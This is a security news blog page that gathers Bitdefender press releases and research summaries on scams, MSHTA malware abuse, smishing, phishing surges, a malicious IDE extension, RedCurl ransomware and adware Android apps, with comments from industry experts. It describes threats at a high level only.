The IT Nerd

Bitdefender today released the Bitdefender 2026 Global Scam Intelligence Report, a comprehensive analysis of the global scam landscape over a 12-month period. The report examines how scams have evolved into a sophisticated, cross-platform criminal industry, revealing the tactics, channels, and behavioral patterns that fraudsters use to target consumers worldwide.

Online scams and fraud continue to escalate at an alarming rate. Losses due to scams globally have reached nearly half a billion US dollars in 2025 alone. Bitdefender’s independent global survey of 7,000 consumers reinforces the severity of the problem with 1 in 7 (14%) reporting falling victim to a scam in the past year, a finding that confirms scams as not merely a cybersecurity issue, but a serious threat to consumers’ financial security and digital identity.

The Bitdefender 2026 Global Scam Intelligence Report is built from real-time insights spanning trillions of URLs, billions of messages, live ad ecosystems, call honeypots, and direct consumer submissions. This telemetry captures scam activity as it happens, tracking campaigns across platforms and documenting attacker behavior in motion. The result is a field report that gives both consumers and the security community a comprehensive, data-driven view of how scams operate at scale.

Key findings include:

• Younger generation is highly targeted – Younger consumers are now twice as likely to fall victim to scams as older generations, with a victimization rate of 20% compared to 9.7% among those 55 and older. Scammers have followed their audience to the social platforms, gaming environments, and messaging apps where younger users spend the most time.
• 1 in 20 text messages shows signs of fraud – Extensive analysis of SMS traffic found that 5.2% of all messages analyzed (roughly 1 in 20) exhibited characteristics consistent with scam infrastructure or coordinated fraud activity. For a communication channel people inherently trust, that exposure rate is a serious cause for concern.
• Voice calls remain a high-yield fraud channel – Bitdefender analyzed nearly 150 million incoming calls during the reporting period. More than 23 million were classified as unwanted, meaning about 1 in 6 calls reaching protected devices was deemed fraudulent or unsolicited. The system processed more than 52 million unique phone numbers, with over half a million flagged as unwanted.
• Finance scams dominate across every channel – Investment fraud, banking phishing, and crypto-themed scams appear consistently across SMS, social ads, WhatsApp, voice calls, and email. The lure changes with the platform, but the objective remains constant: quickly move the victim toward a financial decision before skepticism has a chance to intervene.

To download a complimentary copy of the Bitdefender 2026 Global Scam Intelligence Report, visit here.

Bitdefender has released new research documenting how attackers continue to abuse Microsoft’s legacy MSHTA utility to deliver malware through stealthy, multi-stage attack chains. The abuse of MSHTA affects both businesses and consumers who run Windows.

Despite Internet Explorer reaching end of support years ago, MSHTA remains enabled by default on Windows systems and continues to be heavily exploited by cybercriminals to execute malicious scripts, retrieve remote payloads, and evade detection using trusted Microsoft-signed processes.

Key findings include:

• MSHTA used to silently deliver multiple malware families, including LummaStealer, Amatera, ClipBanker, PurpleFox, and CountLoader
• Multi-stage, fileless attack chains using HTA scripts, PowerShell, and in-memory payloads to bypass traditional detection tools
• Use of ClickFix-style lures and fake software downloads designed to trick users into manually launching malware infections

The research highlights how legacy Windows utilities continue to pose risks to general users and organizations by providing attackers with trusted tools that blend malicious activity into legitimate system behavior.

You can read the research here: https://www.bitdefender.com/en-us/blog/labs/microsofts-mshta-legacy-malware-windows

UPDATE: Adrian Culley, Senior Sales Engineer, SafeBreach has this comment:

Adrian has extensive global cyber investigations experience, including technical roles at SafeBreach, Trellix, Palo Alto Networks, Norse, and the London Metropolitan Police Service. 

“Reporting this week of a fresh surge in malware campaigns abusing mshta.exe should surprise nobody who has spent any time on the offensive side of the trade. The Windows utility has been shipping for 26 years, it is signed by Microsoft, it runs script in a trusted process context, and it is allow-listed by default in most enterprise estates. From APT28 to FIN7, from MuddyWater to whichever commodity loader is fashionable this month, attackers reach for it for the same reason burglars reach for unlocked doors.

There is no patch for this, because mshta is working as designed. What isn’t working is the quiet assumption — held in nearly every security organisation I walk into — that the AppLocker rule, the ASR policy, the EDR behavioural detection written eighteen months ago all still fire today. Estates drift. Exceptions accumulate. Rules quietly degrade. And almost no defender can prove, on demand, that they don’t.

The fix isn’t another product. It’s a discipline: safely run the attack on your own production estate, on a continuous schedule, and watch your stack respond. Replace “we believe we’re covered” with “we proved we are.”

Anything less is exposure management by hope.”

Bitdefender has released new research on a large-scale global smishing campaign targeting consumers with fake toll, parking, and traffic fine-themed messages designed to steal money and personal information or remotely control devices. The campaign remains active across 12 countries.

Researchers identified more than 79,000 fraudulent text messages and over 31,900 malicious URLs, using techniques such as sender ID spoofing, rotating domains, and masked links to evade detection.

The messages impersonate trusted transport authorities and pressure victims into making payments through fake websites or, in many cases, installing malware.

Key takeaways from the research:

• Over 79,000 fraudulent messages have already been detected in 40 distinct SMS scam campaigns
• The scams impersonate DMVs, toll operators, and parking authorities from all over the world
• Victims are redirected to fake payment sites or, in some cases, malware downloads
• Its infrastructure is characterized by rapid domain generation, sender-ID spoofing, and multiple evasion techniques targeting mobile operating systems

You can read further into this campaign here.

Bitdefender today announced Bitdefender GravityZone Extended Email Security, unifying email and endpoint protection within a single platform. Built for organizations, managed service providers (MSPs) and their customers, it leverages an Integrated Cloud Email Security (ICES) approach to deliver continuous protection before and after delivery against modern email-borne threats including phishing, business email compromise (BEC), ransomware, impersonation, and insider-driven attacks.

“Email threats are growing more sophisticated and effective as total business email compromise-related payments crossed the $6 billion threshold in 2024”, according to Gartner®.¹ In a global survey of 1,200 IT and security professionals, 42% identified BEC as the greatest threat to their organization, while 66% reported an increase in these types of attacks.

Legacy email security solutions often focus on pre-delivery filtering, leaving gaps once threats reach user inboxes. Siloed email and endpoint security tools further create blind spots attackers exploit, increasing dwell time and delaying detection.

Bitdefender GravityZone Extended Email Security is a native email security solution that closes this gap by combining secure email gateway (SEG) filtering with API-based post-delivery protection. This dual-layer approach stops threats before delivery and continuously detects and remediates them after they reach inboxes, helping ensure complete protection across the email threat lifecycle. The solution builds on technology gained through Bitdefender’s acquisition of Mesh Security, further strengthening its email protection capabilities.

Fully integrated into Bitdefender GravityZone, the company’s unified security, risk analytics, and compliance platform, GravityZone Extended Email Security extends protection from endpoint to inbox. It integrates seamlessly into existing environments, enabling rapid deployment and time to value.

Key Benefits of GravityZone Extended Email Security include:

• Unified email and endpoint protection – GravityZone Extended Email Security uses artificial intelligence (AI) and real-time threat intelligence to stop phishing, BEC, impersonation, ransomware, and other advanced threats. Emails are inspected before delivery and continuously monitored after delivery, enabling automated quarantine and remediation to reduce dwell time and limit user exposure.

• Consolidates tools and reduces security team workload – The platform streamlines security management by unifying tools and automating detection and response across the email attack chain. Continuous monitoring and automated remediation reduce manual effort and improve response times.

• Improves efficiency and scales security operations – Built for modern environments and service delivery models, GravityZone Extended Email Security enables efficient, scalable security for businesses and MSPs. Centralized management, continuous policy enforcement, and streamlined workflows support multi-tenant environments and simplify security across distributed infrastructures.

• Fast, flexible deployment across any environment – Organizations and MSPs can deploy the solution as a SEG across Microsoft 365, hybrid, and diverse environments, with API-based and combined deployment models supported for Microsoft 365.

Availability

Bitdefender GravityZone Extended Email Security is available now as an add-on to GravityZone endpoint security deployments. For more information, visit here.

¹Gartner, How to Develop an Email Security Strategy, Max Taggett, Nikul Patel, August 20, 2025.

Gartner is a registered trademark of Gartner, Inc. and/or its affiliates and is used herein with permission. All rights reserved.

Bitdefender, a global cybersecurity leader, today announced the Bitdefender Attack Surface Assessment, a complimentary evaluation that helps organizations identify and reduce hidden internal cyber risk caused by unnecessary user access to applications, tools, and operating system utilities commonly exploited in modern attacks. The assessment gives organizations a clear, data-driven view of their internal attack surface and provides actionable guidance to help prioritize and remediate exposure.

Businesses face growing challenges defending against Living-Off-the-Land (LOTL), fileless, and other non-malware attack techniques, which leverage legitimate operating system tools and trusted applications to breach systems and evade detection while blending into normal activity.

Analysis of more than 700,000 real-world security incidents found that legitimate tools and LOTL techniques are involved in more than 84% of major attacks. Cybercriminals increasingly exploit widely available utilities such as PowerShell, WMIC, and others to gain access, escalate privileges and move laterally within environments undetected. As a result, organizations are being forced to shift toward a prevention-first security posture to proactively close attack paths before they can be exploited.

The Bitdefender Attack Surface Assessment addresses this critical security gap through a guided engagement that helps organizations uncover this largely invisible internal exposure, assess its impact on overall risk and identify practical steps for remediation. Organizations enroll and immediately begin assessing and monitoring their environment with no disruption to employees or daily operations.

The program is powered by Bitdefender GravityZone PHASR (Proactive Hardening and Attack Surface Reduction), a first-to-market endpoint security innovation that combines dynamic, behavior-based security hardening with real-time threat intelligence. It helps identify excessive user access and restrict or block unnecessary applications and tools without impacting business operations.

Key Benefits of the Attack Surface Assessment include:

• Quantify internal risk at the user level – Gain precise visibility into attack surface exposure down to each user, including access to applications, tools and utilities, mapped against their baseline behavior and real-time threat intelligence.
• Identify shadow IT and unauthorized tools – Uncover shadow IT and unauthorized tools, including unusual network activity, access to non-approved binaries, and unrecognized applications attempting to access company resources.
• Reduce the attack surface using actionable insights – Receive actionable recommendations to focus mitigation and begin hardening the internal attack surface, with the option to apply controls manually or automatically with Bitdefender guidance. Organizations can reduce their attack surface by up to 95%, significantly lowering exposure to modern attack techniques.  

Availability

The Bitdefender Attack Surface Assessment is a complimentary, 45-day turnkey program that requires minimal effort and is available now for organizations with 250 or more employees. To learn more or enroll, visit here.

Bitdefender has released new research revealing that phishing and malware campaigns targeting Gulf countries have surged by approximately 130% on average following the escalation of the war in Iran.

Researchers observed a sustained spike in malicious email activity beginning February 28, with campaigns quickly doubling and peaking at nearly four times pre-war levels.

Key findings:

• Threat actors are delivering a mix of remote access trojans, spyware, and fileless attacks that execute in memory
• The attacks rely heavily on business-themed lures, including invoices, contracts, banking communications, and delivery notifications
• No confirmed state-sponsored attribution; however, phishing is often a precursor to more complex attacks, enabling initial access to targeted environments.

You can read the research here: https://www.bitdefender.com/en-gb/blog/hotforsecurity/gulf-countries-phishing-surge

Bitdefender has released research warning of an active attack using a malicious extension for the Windsurf IDE (integrated development environment). The campaign intentionally targets software developers, who typically have privileged access, API keys, and other high-value credentials.

Disguised as a legitimate R programming language tool, the extension installs a multi-stage NodeJS credential stealer that retrieves encrypted payloads from the Solana blockchain, leveraging legitimate third-party infrastructure instead of traditional command-and-control (C2) servers to evade detection.

Cybercriminals are increasingly abusing trusted developer ecosystems and decentralized infrastructure to plant malware and establish persistence.

You can read the research here: https://www.bitdefender.com/en-us/blog/labs/windsurf-extension-malware-solana

Bitdefender has released new findings showing that Valentine’s Day–themed spam has spiked in recent weeks, using the promise of love, discounts, and gifts from popular brands such as Dior, Sephora, and Walmart as lures.

41% of all Valentine’s Day spam observed had deceptive or malicious intent. Common tactics used to snare victims included phishing attempts, dating scams, fake giveaways, advance-fee schemes, and misleading surveys.

Findings include:

• The U.S. was the most targeted destination at 55%, followed by Germany (13%), Ireland (8%), and the UK (6%).
• The U.S. also ranked as the top source, responsible for over 43% of Valentine’s-related spam.
• About 10% of scam-related messages used dating-themed lures, often relying on AI-generated profile images

You can get more details here: https://www.bitdefender.com/en-us/blog/hotforsecurity/nearly-4-in-10-valentines-day-emails-are-scams-what-bitdefender-antispam-lab-is-seeing-in-2026

A threat actor named ‘RedCurl,’ known for stealthy corporate espionage operations since 2018, is now using a ransomware encryptor designed to target Hyper-V virtual machines. This is what Bitdefender had to say:

This research, conducted by Bitdefender Labs, presents the first documented analysis of a ransomware campaign attributed to the RedCurl group (also known as Earth Kapre or Red Wolf). RedCurl has historically maintained a low profile, relying heavily on Living-off-the-Land (LOTL) techniques for corporate cyber espionage and data exfiltration. This shift to ransomware marks a significant evolution in their tactics.

This new ransomware, which we have named QWCrypt based on a self-reference ‘qwc’ found within the executable, is previously undocumented and distinct from known ransomware families.

Roger Grimes, Data-Driven Defense Evangelist at KnowBe4, commented:

“While targeting Microsoft Hyper-V servers is nothing new (example: https://cybercx.com/blog/akira-ransomware/), this indicates an increased focus on Hyper-V and virtualization platforms in general. It’s actually far easier to bring down an organization using an enterprise virtualization platform than one with hundreds of disparate, separately located on-premise servers. If I get on your VM host server, now, with one compromise, I can more easily control and manipulate the whole kingdom. I can more easily encrypt entire servers. I can more easily exfiltrate large amounts of sensitive data. I can more easily corrupt backup services. It’s not good. But the question you need to ask is how the bad guy got to your VM host servers in the first place? Was it social engineering? Was it unpatched software or firmware? Was it stolen logon credentials or bypassed phishable MFA? Because those are the most likely reasons and if you don’t figure those out your environment is not going to be safe no matter what else you do.”

Using an anomaly detection feature that was added to its Mobile Security software, Bitdefender detected over 60,000 malicious Android apps disguised as legitimate applications that have been installing adware for the last 6 months.
 
The global campaign that predominantly targets US users is believed to have started in October 2022 and is being distributed as fake security software, game cracks, cheats, VPN software, Netflix, and utility apps on third-party sites, where malware inspection isn’t as strong.
 
When the app is installed and launched, it will display an error message stating that the “Application is unavailable in your region. Tap OK to uninstall,” but actually, the app is not uninstalled and instead sleeps for two hours before registering two ‘intents’ that cause the app to launch when the device is booted or unlocked. Bitdefender says the latter intent is disabled for the first 2 days, which helps evade detection.
 
The app then reaches out to the attackers’ servers and retrieves advertisement URLs to be displayed in the mobile browser or as a full-screen WebView ad.
 
“However, the threat actors involved can easily switch tactics to redirect users to other types of malware, such as banking Trojans to steal credentials and financial information or ransomware,” warns Bitdefender.

Ted Miracco, CEO, Approov Mobile Security had this to same:

   “The discovery of these malicious Android apps raises concerns about how easy it is to distribute malware and the fact that this campaign predominantly targets users in the United States is concerning, as it suggests that a large number of individuals may be at risk. This highlights the need for robust security measures, like app attestation to protect users from such threats. It also serves as a reminder for users to exercise caution when downloading and installing applications, particularly from unofficial sources.”

Dave Ratner, CEO, HYAS follows up with this:

   “The identification of beaconing behavior to adversary infrastructure via Protective DNS is not only for laptops and servers; the explosion of mobile-based malware highlights just how important it is to extend Protective DNS across all connected devices. Bad actors will continue to find innovative ways to trick users but having the visibility to see the anomalous communication reaching out to the adversary’s servers, and the ability to block it, provides a key layer of defense that is critical in today’s world.”

The fact that these Android apps are out there should send a chill down the spine of every Android user. Thus it means to me that Google as well as users of Android phones really need to have their heads on a swivel to make sure that this doesn’t become an extremely popular attack vector.